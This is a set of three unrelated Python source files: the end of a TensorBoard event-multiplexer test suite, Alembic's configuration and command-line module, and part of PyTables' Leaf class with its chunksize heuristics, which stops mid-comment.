def Tensors(self, tag_name):
return self._TagHelper(tag_name, event_accumulator.TENSORS)
def Reload(self):
self.reload_called = True
# pylint: disable=unused-argument
def _GetFakeAccumulator(
path,
size_guidance=None,
compression_bps=None,
purge_orphaned_data=None):
return _FakeAccumulator(path)
# pylint: enable=unused-argument
class EventMultiplexerTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EventMultiplexerTest, self).setUp()
self.stubs = googletest.StubOutForTesting()
self.stubs.Set(event_accumulator, 'EventAccumulator', _GetFakeAccumulator)
def tearDown(self):
self.stubs.CleanUp()
def testEmptyLoader(self):
x = event_multiplexer.EventMultiplexer()
self.assertEqual(x.Runs(), {})
def testRunNamesRespected(self):
x = event_multiplexer.EventMultiplexer({'run1': 'path1', 'run2': 'path2'})
self.assertItemsEqual(sorted(x.Runs().keys()), ['run1', 'run2'])
self.assertEqual(x._GetAccumulator('run1')._path, 'path1')
self.assertEqual(x._GetAccumulator('run2')._path, 'path2')
def testReload(self):
x = event_multiplexer.EventMultiplexer({'run1': 'path1', 'run2': 'path2'})
self.assertFalse(x._GetAccumulator('run1').reload_called)
self.assertFalse(x._GetAccumulator('run2').reload_called)
x.Reload()
self.assertTrue(x._GetAccumulator('run1').reload_called)
self.assertTrue(x._GetAccumulator('run2').reload_called)
def testScalars(self):
x = event_multiplexer.EventMultiplexer({'run1': 'path1', 'run2': 'path2'})
run1_actual = x.Scalars('run1', 'sv1')
run1_expected = ['path1/sv1']
self.assertEqual(run1_expected, run1_actual)
def testHealthPills(self):
x = event_multiplexer.EventMultiplexer({'run1': 'path1', 'run2': 'path2'})
self.assertEqual(['path1/hp1', 'path1/hp2'], x.HealthPills('run1', 'Add'))
def testExceptions(self):
x = event_multiplexer.EventMultiplexer({'run1': 'path1', 'run2': 'path2'})
with self.assertRaises(KeyError):
x.Scalars('sv1', 'xxx')
def testInitialization(self):
x = event_multiplexer.EventMultiplexer()
self.assertEqual(x.Runs(), {})
x = event_multiplexer.EventMultiplexer({'run1': 'path1', 'run2': 'path2'})
self.assertItemsEqual(x.Runs(), ['run1', 'run2'])
self.assertEqual(x._GetAccumulator('run1')._path, 'path1')
self.assertEqual(x._GetAccumulator('run2')._path, 'path2')
def testAddRunsFromDirectory(self):
x = event_multiplexer.EventMultiplexer()
tmpdir = self.get_temp_dir()
join = os.path.join
fakedir = join(tmpdir, 'fake_accumulator_directory')
realdir = join(tmpdir, 'real_accumulator_directory')
self.assertEqual(x.Runs(), {})
x.AddRunsFromDirectory(fakedir)
self.assertEqual(x.Runs(), {}, 'loading fakedir had no effect')
_CreateCleanDirectory(realdir)
x.AddRunsFromDirectory(realdir)
self.assertEqual(x.Runs(), {}, 'loading empty directory had no effect')
path1 = join(realdir, 'path1')
gfile.MkDir(path1)
x.AddRunsFromDirectory(realdir)
self.assertEqual(x.Runs(), {}, 'creating empty subdirectory had no effect')
_AddEvents(path1)
x.AddRunsFromDirectory(realdir)
self.assertItemsEqual(x.Runs(), ['path1'], 'loaded run: path1')
loader1 = x._GetAccumulator('path1')
self.assertEqual(loader1._path, path1, 'has the correct path')
path2 = join(realdir, 'path2')
_AddEvents(path2)
x.AddRunsFromDirectory(realdir)
self.assertItemsEqual(x.Runs(), ['path1', 'path2'])
self.assertEqual(
x._GetAccumulator('path1'), loader1, 'loader1 not regenerated')
path2_2 = join(path2, 'path2')
_AddEvents(path2_2)
x.AddRunsFromDirectory(realdir)
self.assertItemsEqual(x.Runs(), ['path1', 'path2', 'path2/path2'])
self.assertEqual(
x._GetAccumulator('path2/path2')._path, path2_2, 'loader2 path correct')
def testAddRunsFromDirectoryThatContainsEvents(self):
x = event_multiplexer.EventMultiplexer()
tmpdir = self.get_temp_dir()
join = os.path.join
realdir = join(tmpdir, 'event_containing_directory')
_CreateCleanDirectory(realdir)
self.assertEqual(x.Runs(), {})
_AddEvents(realdir)
x.AddRunsFromDirectory(realdir)
self.assertItemsEqual(x.Runs(), ['.'])
subdir = join(realdir, 'subdir')
_AddEvents(subdir)
x.AddRunsFromDirectory(realdir)
self.assertItemsEqual(x.Runs(), ['.', 'subdir'])
def testAddRunsFromDirectoryWithRunNames(self):
x = event_multiplexer.EventMultiplexer()
tmpdir = self.get_temp_dir()
join = os.path.join
realdir = join(tmpdir, 'event_containing_directory')
_CreateCleanDirectory(realdir)
self.assertEqual(x.Runs(), {})
_AddEvents(realdir)
x.AddRunsFromDirectory(realdir, 'foo')
self.assertItemsEqual(x.Runs(), ['foo/.'])
subdir = join(realdir, 'subdir')
_AddEvents(subdir)
x.AddRunsFromDirectory(realdir, 'foo')
self.assertItemsEqual(x.Runs(), ['foo/.', 'foo/subdir'])
def testAddRunsFromDirectoryWalksTree(self):
x = event_multiplexer.EventMultiplexer()
tmpdir = self.get_temp_dir()
join = os.path.join
realdir = join(tmpdir, 'event_containing_directory')
_CreateCleanDirectory(realdir)
_AddEvents(realdir)
sub = join(realdir, 'subdirectory')
sub1 = join(sub, '1')
sub2 = join(sub, '2')
sub1_1 = join(sub1, '1')
_AddEvents(sub1)
_AddEvents(sub2)
_AddEvents(sub1_1)
x.AddRunsFromDirectory(realdir)
self.assertItemsEqual(x.Runs(), ['.', 'subdirectory/1', 'subdirectory/2',
'subdirectory/1/1'])
def testAddRunsFromDirectoryThrowsException(self):
x = event_multiplexer.EventMultiplexer()
tmpdir = self.get_temp_dir()
filepath = _AddEvents(tmpdir)
with self.assertRaises(ValueError):
x.AddRunsFromDirectory(filepath)
def testAddRun(self):
x = event_multiplexer.EventMultiplexer()
x.AddRun('run1_path', 'run1')
run1 = x._GetAccumulator('run1')
self.assertEqual(sorted(x.Runs().keys()), ['run1'])
self.assertEqual(run1._path, 'run1_path')
x.AddRun('run1_path', 'run1')
self.assertEqual(run1, x._GetAccumulator('run1'), 'loader not recreated')
x.AddRun('run2_path', 'run1')
new_run1 = x._GetAccumulator('run1')
self.assertEqual(new_run1._path, 'run2_path')
self.assertNotEqual(run1, new_run1)
x.AddRun('runName3')
self.assertItemsEqual(sorted(x.Runs().keys()), ['run1', 'runName3'])
self.assertEqual(x._GetAccumulator('runName3')._path, 'runName3')
def testAddRunMaintainsLoading(self):
x = event_multiplexer.EventMultiplexer()
x.Reload()
x.AddRun('run1')
x.AddRun('run2')
self.assertTrue(x._GetAccumulator('run1').reload_called)
self.assertTrue(x._GetAccumulator('run2').reload_called)
class EventMultiplexerWithRealAccumulatorTest(test_util.TensorFlowTestCase):
def testDeletingDirectoryRemovesRun(self):
x = event_multiplexer.EventMultiplexer()
tmpdir = self.get_temp_dir()
join = os.path.join
run1_dir = join(tmpdir, 'run1')
run2_dir = join(tmpdir, 'run2')
run3_dir = join(tmpdir, 'run3')
for dirname in [run1_dir, run2_dir, run3_dir]:
_AddEvents(dirname)
x.AddRun(run1_dir, 'run1')
x.AddRun(run2_dir, 'run2')
x.AddRun(run3_dir, 'run3')
x.Reload()
# Delete the directory, then reload.
shutil.rmtree(run2_dir)
x.Reload()
self.assertNotIn('run2', x.Runs().keys())
if __name__ == '__main__':
googletest.main()
|
from argparse import ArgumentParser
from configparser import ConfigParser
import inspect
import os
import sys
from . import __version__
from . import command
from . import util
from .util import compat
class Config:
r"""Represent an Alembic configuration.
Within an ``env.py`` script, this is available
via the :attr:`.EnvironmentContext.config` attribute,
which in turn is available at ``alembic.context``::
from alembic import context
some_param = context.config.get_main_option("my option")
When invoking Alembic programmatically, a new
:class:`.Config` can be created by passing
the name of an .ini file to the constructor::
from alembic.config import Config
alembic_cfg = Config("/path/to/yourapp/alembic.ini")
With a :class:`.Config` object, you can then
run Alembic commands programmatically using the directives
in :mod:`alembic.command`.
The :class:`.Config` object can also be constructed without
a filename. Values can be set programmatically, and
new sections will be created as needed::
from alembic.config import Config
alembic_cfg = Config()
alembic_cfg.set_main_option("script_location", "myapp:migrations")
alembic_cfg.set_main_option("sqlalchemy.url", "postgresql://foo/bar")
alembic_cfg.set_section_option("mysection", "foo", "bar")
.. warning::
When using programmatic configuration, make sure the
``env.py`` file in use is compatible with the target configuration;
including that the call to Python ``logging.fileConfig()`` is
omitted if the programmatic configuration doesn't actually include
logging directives.
For passing non-string values to environments, such as connections and
engines, use the :attr:`.Config.attributes` dictionary::
with engine.begin() as connection:
alembic_cfg.attributes['connection'] = connection
command.upgrade(alembic_cfg, "head")
:param file\_: name of the .ini file to open.
:param ini_section: name of the main Alembic section within the
.ini file
:param output_buffer: optional file-like input buffer which
will be passed to the :class:`.MigrationContext` - used to redirect
the output of "offline generation" when using Alembic programmatically.
:param stdout: buffer where the "print" output of commands will be sent.
Defaults to ``sys.stdout``.
:param config_args: A dictionary of keys and values that will be used
for substitution in the alembic config file. The dictionary as given
is **copied** to a new one, stored locally as the attribute
``.config_args``. When the :attr:`.Config.file_config` attribute is
first invoked, the replacement variable ``here`` will be added to this
dictionary before the dictionary is passed to ``ConfigParser()``
to parse the .ini file.
:param attributes: optional dictionary of arbitrary Python keys/values,
which will be populated into the :attr:`.Config.attributes` dictionary.
.. seealso::
:ref:`connection_sharing`
"""
def __init__(
self,
file_=None,
ini_section="alembic",
output_buffer=None,
stdout=sys.stdout,
cmd_opts=None,
config_args=util.immutabledict(),
attributes=None,
):
"""Construct a new :class:`.Config`"""
self.config_file_name = file_
self.config_ini_section = ini_section
self.output_buffer = output_buffer
self.stdout = stdout
self.cmd_opts = cmd_opts
self.config_args = dict(config_args)
if attributes:
self.attributes.update(attributes)
cmd_opts = None
"""The command-line options passed to the ``alembic`` script.
Within an ``env.py`` script this can be accessed via the
:attr:`.EnvironmentContext.config` attribute.
.. seealso::
:meth:`.EnvironmentContext.get_x_argument`
"""
config_file_name = None
"""Filesystem path to the .ini file in use."""
config_ini_section = None
"""Name of the config file section to read basic configuration
from. Defaults to ``alembic``, that is the ``[alembic]`` section
of the .ini file. This value is modified using the ``-n/--name``
option to the Alembic runner.
"""
@util.memoized_property
def attributes(self):
"""A Python dictionary for storage of additional state.
This is a utility dictionary which can include not just strings but
engines, connections, schema objects, or anything else.
Use this to pass objects into an env.py script, such as passing
a :class:`sqlalchemy.engine.base.Connection` when calling
commands from :mod:`alembic.command` programmatically.
.. seealso::
:ref:`connection_sharing`
:paramref:`.Config.attributes`
"""
return {}
def print_stdout(self, text, *arg):
"""Render a message to standard out.
When :meth:`.Config.print_stdout` is called with additional args
those arguments will be formatted against the provided text,
otherwise we simply output the provided text verbatim.
e.g.::
>>> config.print_stdout('Some text %s', 'arg')
Some text arg
"""
if arg:
output = compat.text_type(text) % arg
else:
output = compat.text_type(text)
util.write_outstream(self.stdout, output, "\n")
@util.memoized_property
def file_config(self):
"""Return the underlying ``ConfigParser`` object.
Direct access to the .ini file is available here,
though the :meth:`.Config.get_section` and
:meth:`.Config.get_main_option`
methods provide a possibly simpler interface.
"""
if self.config_file_name:
here = os.path.abspath(os.path.dirname(self.config_file_name))
else:
here = ""
self.config_args["here"] = here
file_config = ConfigParser(self.config_args)
if self.config_file_name:
file_config.read([self.config_file_name])
else:
file_config.add_section(self.config_ini_section)
return file_config
def get_template_directory(self):
"""Return the directory where Alembic setup templates are found.
This method is used by the alembic ``init`` and ``list_templates``
commands.
"""
import alembic
package_dir = os.path.abspath(os.path.dirname(alembic.__file__))
return os.path.join(package_dir, "templates")
def get_section(self, name, default=None):
"""Return all the configuration options from a given .ini file section
as a dictionary.
"""
if not self.file_config.has_section(name):
return default
return dict(self.file_config.items(name))
def set_main_option(self, name, value):
"""Set an option programmatically within the 'main' section.
This overrides whatever was in the .ini file.
:param name: name of the value
:param value: the value. Note that this value is passed to
``ConfigParser.set``, which supports variable interpolation using
pyformat (e.g. ``%(some_value)s``). A raw percent sign not part of
an interpolation symbol must therefore be escaped, e.g. ``%%``.
The given value may refer to another value already in the file
using the interpolation format.
"""
self.set_section_option(self.config_ini_section, name, value)
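# Hedged example of the escaping rule noted above (the URL is hypothetical):
#
#   cfg.set_main_option("sqlalchemy.url",
#                       "postgresql://scott:tiger%%40host/mydb")
#   # a literal '%' must be doubled so ConfigParser interpolation does not
#   # treat it as a substitution marker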
def remove_main_option(self, name):
self.file_config.remove_option(self.config_ini_section, name)
def set_section_option(self, section, name, value):
"""Set an option programmatically within the given section.
The section is created if it doesn't exist already.
The value here will override whatever was in the .ini
file.
:param section: name of the section
:param name: name of the value
:param value: the value. Note that this value is passed to
``ConfigParser.set``, which supports variable interpolation using
pyformat (e.g. ``%(some_value)s``). A raw percent sign not part of
an interpolation symbol must therefore be escaped, e.g. ``%%``.
The given value may refer to another value already in the file
using the interpolation format.
"""
if not self.file_config.has_section(section):
self.file_config.add_section(section)
self.file_config.set(section, name, value)
def get_section_option(self, section, name, default=None):
"""Return an option from the given section of the .ini file."""
if not self.file_config.has_section(section):
raise util.CommandError(
"No config file %r found, or file has no "
"'[%s]' section" % (self.config_file_name, section)
)
if self.file_config.has_option(section, name):
return self.file_config.get(section, name)
else:
return default
def get_main_option(self, name, default=None):
"""Return an option from the 'main' section of the .ini file.
This defaults to being a key from the ``[alembic]``
section, unless the ``-n/--name`` flag were used to
indicate a different section.
"""
return self.get_section_option(self.config_ini_section, name, default)
class CommandLine:
def __init__(self, prog=None):
self._generate_args(prog)
def _generate_args(self, prog):
def add_options(fn, parser, positional, kwargs):
kwargs_opts = {
"template": (
"-t",
"--template",
dict(
default="generic",
type=str,
help="Setup template for use with 'init'",
),
),
"message": (
"-m",
"--message",
dict(
type=str, help="Message string to use with 'revision'"
),
),
"sql": (
"--sql",
dict(
action="store_true",
help="Don't emit SQL to database - dump to "
"standard output/file instead. See docs on "
"offline mode.",
),
),
"tag": (
"--tag",
dict(
type=str,
help="Arbitrary 'tag' name - can be used by "
"custom env.py scripts.",
),
),
"head": (
"--head",
dict(
type=str,
help="Specify head revision or <branchname>@head "
"to base new revision on.",
),
),
"splice": (
"--splice",
dict(
action="store_true",
help="Allow a non-head revision as the "
"'head' to splice onto",
),
),
"depends_on": (
"--depends-on",
dict(
action="append",
help="Specify one or more revision identifiers "
"which this revision should depend on.",
),
),
"rev_id": (
"--rev-id",
dict(
type=str,
help="Specify a hardcoded revision id instead of "
"generating one",
),
),
"version_path": (
"--version-path",
dict(
type=str,
help="Specify specific path from config for "
"version file",
),
),
"branch_label": (
"--branch-label",
dict(
type=str,
help="Specify a branch label to apply to the "
"new revision",
),
),
"verbose": (
"-v",
"--verbose",
dict(action="store_true", help="Use more verbose output"),
),
"resolve_dependencies": (
"--resolve-dependencies",
dict(
action="store_true",
help="Treat dependency versions as down revisions",
),
),
"autogenerate": (
"--autogenerate",
dict(
action="store_true",
help="Populate revision script with candidate "
"migration operations, based on comparison "
"of database to model.",
),
),
"rev_range": (
"-r",
"--rev-range",
dict(
action="store",
help="Specify a revision range; "
"format is [start]:[end]",
),
),
"indicate_current": (
"-i",
"--indicate-current",
dict(
action="store_true",
help="Indicate the current revision",
),
),
"purge": (
"--purge",
dict(
action="store_true",
help="Unconditionally erase the version table "
"before stamping",
),
),
"package": (
"--package",
dict(
action="store_true",
help="Write empty __init__.py files to the "
"environment and version locations",
),
),
}
positional_help = {
"directory": "location of scripts directory",
"revision": "revision identifier",
"revisions": "one or more revisions, or 'heads' for all heads",
}
for arg in kwargs:
if arg in kwargs_opts:
args = kwargs_opts[arg]
args, kw = args[0:-1], args[-1]
parser.add_argument(*args, **kw)
for arg in positional:
if (
arg == "revisions"
or fn in positional_translations
and positional_translations[fn][arg] == "revisions"
):
subparser.add_argument(
"revisions",
nargs="+",
help=positional_help.get("revisions"),
)
else:
subparser.add_argument(arg, help=positional_help.get(arg))
parser = ArgumentParser(prog=prog)
parser.add_argument(
"--version", action="version", version="%%(prog)s %s" % __version__
)
parser.add_argument(
"-c",
"--config",
type=str,
default=os.environ.get("ALEMBIC_CONFIG", "alembic.ini"),
help="Alternate config file; defaults to value of "
'ALEMBIC_CONFIG environment variable, or "alembic.ini"',
)
parser.add_argument(
"-n",
"--name",
type=str,
default="alembic",
help="Name of section in .ini file to " "use for Alembic config",
)
parser.add_argument(
"-x",
action="append",
help="Additional arguments consumed by "
"custom env.py scripts, e.g. -x "
"setting1=somesetting -x setting2=somesetting",
)
parser.add_argument(
"--raiseerr",
action="store_true",
help="Raise a full stack trace on error",
)
subparsers = parser.add_subparsers()
positional_translations = {command.stamp: {"revision": "revisions"}}
for fn in [getattr(command, n) for n in dir(command)]:
if (
inspect.isfunction(fn)
and fn.__name__[0] != "_"
and fn.__module__ == "alembic.command"
):
spec = compat.inspect_getargspec(fn)
if spec[3]:
positional = spec[0][1 : -len(spec[3])]
kwarg = spec[0][-len(spec[3]) :]
else:
positional = spec[0][1:]
kwarg = []
if fn in positional_translations:
positional = [
positional_translations[fn].get(name, name)
for name in positional
]
# parse first line(s) of helptext without a line break
help_ = fn.__doc__
if help_:
help_text = []
for line in help_.split("\n"):
if not line.strip():
break
else:
help_text.append(line.strip())
else:
help_text = ""
subparser = subparsers.add_parser(
fn.__name__, help=" ".join(help_text)
)
add_options(fn, subparser, positional, kwarg)
subparser.set_defaults(cmd=(fn, positional, kwarg))
self.parser = parser
def run_cmd(self, config, options):
fn, positional, kwarg = options.cmd
try:
fn(
config,
*[getattr(options, k, None) for k in positional],
**dict((k, getattr(options, k, None)) for k in kwarg)
)
except util.CommandError as e:
if options.raiseerr:
raise
else:
util.err(str(e))
def main(self, argv=None):
options = self.parser.parse_args(argv)
if not hasattr(options, "cmd"):
# see http://bugs.python.org/issue9253, argparse
# behavior changed incompatibly in py3.3
self.parser.error("too few arguments")
else:
cfg = Config(
file_=options.config,
ini_section=options.name,
cmd_opts=options,
)
self.run_cmd(cfg, options)
def main(argv=None, prog=None, **kwargs):
"""The console runner function for Alembic."""
CommandLine(prog=prog).main(argv=argv)
if __name__ == "__main__":
main()
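# Illustrative invocations of the console runner defined above (as exposed by
# the ``alembic`` entry point; file names and messages are hypothetical):
#
#   alembic -c alembic.ini upgrade head
#   alembic revision -m "add users table" --autogenerate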
|
# -*- coding: utf-8 -*-
########################################################################
#
# License: BSD
# Created: October 14, 2002
# Author: Francesc Alted - [email protected]
#
# $Id$
#
########################################################################
"""Here is defined the Leaf class."""
import warnings
import math
import numpy
from tables.flavor import (check_flavor, internal_flavor,
alias_map as flavor_alias_map)
from tables.node import Node
from tables.filters import Filters
from tables.utils import byteorders, lazyattr, SizeType
from tables.exceptions import PerformanceWarning
from tables import utilsExtension
def csformula(expectedsizeinMB):
"""Return the fitted chunksize for expectedsizeinMB."""
# For a basesize of 8 KB, this will return:
# 8 KB for datasets <= 1 MB
# 1 MB for datasets >= 10 TB
basesize = 8*1024 # 8 KB is a good minimum
return basesize * int(2**math.log10(expectedsizeinMB))
def limit_es(expectedsizeinMB):
"""Protection against creating too small or too large chunks."""
if expectedsizeinMB < 1: # < 1 MB
expectedsizeinMB = 1
elif expectedsizeinMB > 10**7: # > 10 TB
expectedsizeinMB = 10**7
return expectedsizeinMB
def calc_chunksize(expectedsizeinMB):
"""Compute the optimum HDF5 chunksize for I/O purposes.
Rationale: HDF5 takes the data in bunches of chunksize length to
write it on disk. A B-tree in memory is used to map structures on
disk. The more chunks that are allocated for a dataset, the larger
the B-tree. Large B-trees take memory and cause file storage
overhead as well as more disk I/O and higher contention for the
metadata cache. You have to balance between memory and I/O overhead
(small B-trees) and time to access data (big B-trees).
The tuning of the chunksize parameter affects the performance and
the memory consumed. This is based on my own experiments and, as
always, your mileage may vary.
"""
expectedsizeinMB = limit_es(expectedsizeinMB)
zone = int(math.log10(expectedsizeinMB))
expectedsizeinMB = 10**zone
chunksize = csformula(expectedsizeinMB)
return chunksize*8 # XXX: Multiply by 8 seems optimal for
# sequential access
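# A few values produced by the heuristic above (derived from csformula and
# the final *8 factor):
#
#   calc_chunksize(1)      ->  64 KB   (~1 MB dataset)
#   calc_chunksize(1000)   -> 512 KB   (~1 GB dataset)
#   calc_chunksize(10**7)  ->   8 MB   (~10 TB dataset)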
class Leaf(Node):
"""Abstract base class for all PyTables leaves.
A leaf is a node (see the Node class in :class:`Node`) which hangs from a
group (see the Group class in :class:`Group`) but, unlike a group, it can
not have any further children below it (i.e. it is an end node).
This definition includes all nodes which contain actual data (datasets
handled by the Table - see :ref:`TableClassDescr`, Array -
see :ref:`ArrayClassDescr`, CArray - see :ref:`CArrayClassDescr`, EArray -
see :ref:`EArrayClassDescr`, and VLArray - see :ref:`VLArrayClassDescr`
classes) and unsupported nodes (the UnImplemented
class - :ref:`UnImplementedClassDescr`); these classes do in fact inherit
from Leaf.
.. rubric:: Leaf attributes
These instance variables are provided in addition to those in Node
(see :ref:`NodeClassDescr`):
.. attribute:: byteorder
The byte ordering of the leaf data *on disk*. It will be either
``little`` or ``big``.
.. attribute:: dtype
The NumPy dtype that most closely matches this leaf type.
.. attribute:: extdim
The index of the enlargeable dimension (-1 if none).
.. attribute:: nrows
The length of the main dimension of the leaf data.
.. attribute:: nrowsinbuf
The number of rows that fit in internal input buffers.
You can change this to fine-tune the speed or memory
requirements of your application.
.. attribute:: shape
The shape of data in the leaf.
"""
# Properties
# ~~~~~~~~~~
# Node property aliases
# `````````````````````
# These are a little hard to override, but so are properties.
attrs = Node._v_attrs
"""The associated AttributeSet instance - see :ref:`AttributeSetClassDescr`
(This is an easier-to-write alias of :attr:`Node._v_attrs`)."""
title = Node._v_title
"""A description for this node
(This is an easier-to-write alias of :attr:`Node._v_title`)."""
# Read-only node property aliases
# ```````````````````````````````
name = property(
lambda self: self._v_name, None, None,
"""The name of this node in its parent group
(This is an easier-to-write alias of :attr:`Node._v_name`).""" )
chunkshape = property(
lambda self: self._v_chunkshape, None, None,
"""
The HDF5 chunk size for chunked leaves (a tuple).
This is read-only because you cannot change the chunk size of a
leaf once it has been created.
""" )
objectID = property(
lambda self: self._v_objectID, None, None,
"""A node identifier, which may change from run to run.
(This is an easier-to-write alias of :attr:`Node._v_objectID`)""")
ndim = property(
lambda self: len(self.shape), None, None,
"""The number of dimensions of the leaf data.
.. versionadded:: 2.4""" )
# Lazy read-only attributes
# `````````````````````````
@lazyattr
def filters(self):
"""Filter properties for this leaf
See Also
--------
Filters
"""
return Filters._from_leaf(self)
# Other properties
# ````````````````
def _getmaindim(self):
if self.extdim < 0:
return 0 # choose the first dimension
return self.extdim
maindim = property(
_getmaindim, None, None,
"""The dimension along which iterators work.
Its value is 0 (i.e. the first dimension) when the dataset is not
extendable, and self.extdim (where available) for extendable ones.
""" )
def _setflavor(self, flavor):
self._v_file._checkWritable()
check_flavor(flavor)
self._v_attrs.FLAVOR = self._flavor = flavor # logs the change
def _delflavor(self):
del self._v_attrs.FLAVOR
self._flavor = internal_flavor
flavor = property(
lambda self: self._flavor, _setflavor, _delflavor,
"""The type of data object read from this leaf.
It can be any of 'numpy' or 'python'.
You can (and are encouraged to) use this property to get, set
and delete the FLAVOR HDF5 attribute of the leaf. When the leaf
has no such attribute, the default flavor is used.
""")
size_on_disk = property(lambda self: self._get_storage_size(), None, None,
"""
The size of this leaf's data in bytes as it is stored on disk. If the
data is compressed, this shows the compressed size. In the case of
uncompressed, chunked data, this may be slightly larger than the amount
of data, due to partially filled chunks.
""")
# Special methods
# ~~~~~~~~~~~~~~~
def __init__(self, parentNode, name,
new=False, filters=None,
byteorder=None, _log=True):
self._v_new = new
"""Is this the first time the node has been created?"""
self.nrowsinbuf = None
"""
The number of rows that fit in internal input buffers.
You can change this to fine-tune the speed or memory
requirements of your application.
"""
self._flavor = None
"""Private storage for the `flavor` property."""
if new:
# Get filter properties from parent group if not given.
if filters is None:
filters = parentNode._v_filters
self.__dict__['filters'] = filters # bypass the property
if byteorder not in (None, 'little', 'big'):
raise ValueError(
"the byteorder can only take 'little' or 'big' values "
"and you passed: %s" % byteorder)
self.byteorder = byteorder
"""The byte ordering of the leaf data *on disk*."""
# Existing filters need not be read since `filters`
# is a lazy property that automatically handles their loading.
super(Leaf, self).__init__(parentNode, name, _log)
def __len__(self):
"""Return the length of the main dimension of the leaf data.
Please note that this may raise an OverflowError on 32-bit platforms
for datasets having more than 2**31-1 rows. This is a limitation of
Python that you can work around by using the nrows or shape attributes.
"""
return self.nrows
def __str__(self):
"""
The string representation for this object is its pathname in
the HDF5 object tree plus some additional metainfo.
"""
# Get this class name
classname = self.__class__.__name__
# The title
title = self._v_title
# The filters
filters = ""
if self.filters.fletcher32:
filters += ", fletcher32"
if self.filters.complevel:
if self.filters.shuffle:
filters += ", shuffle"
filters += ", %s(%s)" % (self.filters.complib,
self.filters.complevel)
return "%s (%s%s%s) %r" % \
(self._v_pathname, classname, self.shape, filters, title)
# Private methods
# ~~~~~~~~~~~~~~~
def _g_postInitHook(self):
"""Code to be run after node creation and before creation logging.
This method gets or sets the flavor of the leaf.
"""
super(Leaf, self)._g_postInitHook()
if self._v_new: # set flavor of new node
if self._flavor is None:
self._flavor = internal_flavor
else: # flavor set at creation time, do not log
if self._v_file.params['PYTABLES_SYS_ATTRS']:
self._v_attrs._g__setattr('FLAVOR', self._flavor)
else: # get flavor of existing node (if any)
if self._v_file.params['PYTABLES_SYS_ATTRS']:
flavor = getattr(self._v_attrs, 'FLAVOR', internal_flavor)
self._flavor = flavor_alias_map.get(flavor, flavor)
else:
self._flavor = internal_flavor
def _calc_chunkshape(self, expectedrows, rowsize, itemsize):
"""Calculate the shape for the HDF5 chunk."""
# In case of a scalar shape, return the unit chunksize
if self.shape == ():
return (SizeType(1),)
# Compute the chunksize
MB = 1024 * 1024
expectedsizeinMB = (expectedrows * rowsize) // MB
chunksize = calc_chunksize(expectedsizeinMB)
maindim = self.maindim
# Compute the chunknitems
chunknitems = chunksize // itemsize
# Safeguard against itemsizes being extremely large
if chunknitems == 0:
chunknitems = 1
chunkshape = list(self.shape)
# Check whether trimming the main dimension is enough
chunkshape[maindim] = 1
newchunknitems = numpy.prod(chunkshape, dtype=SizeType)
if newchunknitems <= chunknitems:
chunkshape[maindim] = chunknitems // newchunknitems
else:
# No, so start trimming other dimensions as well
for j in xrange(len(chunkshape)):
# Check whether trimming this dimension is enough
chunkshape[j] = 1
newchunknitems = numpy.prod(chunkshape, dtype=SizeType)
if newchunknitems <= chunknitems:
chunkshape[j] = chunknitems // newchunknitems
break
else:
# Oops, we ran out of the loop without a break
# Set the last dimension to chunknitems
chunkshape[-1] = chunknitems
return tuple(SizeType(s) for s in chunkshape)
def _calc_nrowsinbuf(self):
"""Calculate the number of rows that fits on a PyTables buffer."""
params = self._v_file.params
# Compute the nrowsinbuf
rowsize = self.rowsize
buffersize = params['IO_BUFFER_SIZE']
nrowsinbuf = buffersize // rowsize
# Safeguard against row sizes being extremely large
if nrowsinbuf == 0:
nrowsinbuf = 1
# If rowsize is too large, issue a Performance warning
maxrowsize = params['BUFFER_TIMES'] * buffersize
if rowsize > maxrowsize:
warnings.warn("""\
The Leaf ``%s`` is exceeding the maximum recommended rowsize (%d bytes);
be ready to see PyTables asking for *lots* of memory and possibly slow
I/O. You may want to reduce the rowsize by trimming the value of
dimensions that are orthogonal (and preferably close) to the *main*
dimension of this leaf. Alternatively, in case you have specified a
very small/large chunksize, you may want to increase/decrease it."""
% (self._v_pathname, maxrowsize),
PerformanceWarning)
return nrowsinbuf
# This method is appropriate for calls to __getitem__ methods
def _processRange(self, start, stop, step, dim=None, warn_negstep=True):
if dim is None:
nrows = self.nrows # self.shape[self.maindim]
else:
nrows = self.shape[dim]
if warn_negstep and step and step < 0 :
raise ValueError("slice step cannot be negative")
# (start, stop, step) = slice(start, stop, step).indices(nrows)
# The next function is a substitute for slice().indices in order to
# support full 64-bit integer for slices even in 32-bit machines.
# F. Alted 2005-05-08
(start, stop, step) = utilsExtension.getIndices(
start, stop, step, long(nrows) )
return (start, stop, step)
# This method is appropriate for calls to read() methods
def _processRangeRead(self, start, stop, step, warn_negstep=True):
nrows = self.nrows
if start is None and stop is None:
start = 0
stop = nrows
if start is not None and stop is None:
# Protection against start greater than available records
# nrows == 0 is a special case for empty objects
if nrows > 0 and start >= nrows:
raise IndexError( "start of range (%s) is greater than "
"number of rows (%s)" % (start, nrows) )
step = 1
if start == -1: # corner case
stop = nrows
else:
stop = start + 1
# Finally, get the correct values (over the main dimension)
start, stop, step = self._processRange(
start, stop, step, warn_negstep=warn_negstep)
return (start, stop, step)
def _g_copy(self, newParent, newName, recursive, _log=True, **kwargs):
# Compute default arguments.
start = kwargs.pop('start', None)
stop = kwargs.pop('stop', None)
step = kwargs.pop('step', None)
title = kwargs.pop('title', self._v_title)
filters = kwargs.pop('filters', self.filters)
chunkshape = kwargs.pop('chunkshape', self.chunkshape)
copyuserattrs = kwargs.pop('copyuserattrs', True)
stats = kwargs.pop('stats', None)
if chunkshape == 'keep':
chunkshape = self.chunkshape # Keep the original chunkshape
elif chunkshape == 'auto':
chunkshape = None # Will recompute chunkshape
# Fix arguments with explicit None values for backwards compatibility.
if title is None:
title = self._v_title
if filters is None: filters = self.filters
# Create a copy of the object.
(newNode, bytes) = self._g_copyWithStats(
newParent, newName, start, stop, step,
title, filters, chunkshape, _log, **kwargs)
# Copy user attributes if requested (or the flavor at least).
if copyuserattrs == True:
self._v_attrs._g_copy(newNode._v_attrs, copyClass=True)
elif 'FLAVOR' in self._v_attrs:
if self._v_file.params['PYTABLES_SYS_ATTRS']:
newNode._v_attrs._g__setattr('FLAVOR', self._flavor)
newNode._flavor = self._flavor # update cached value
# Update statistics if needed.
if stats is not None:
stats['leaves'] += 1
stats['bytes'] += bytes
return newNode
def _g_fix_byteorder_data(self, data, dbyteorder):
"Fix the byteorder of data passed in constructors."
dbyteorder = byteorders[dbyteorder]
# If self.byteorder has not been passed as an argument of
# the constructor, then set it to the same value of data.
if self.byteorder is None:
self.byteorder = dbyteorder
# Do an additional in-place byteswap of data if the in-memory
# byteorder doesn't match the on-disk one. This is the only
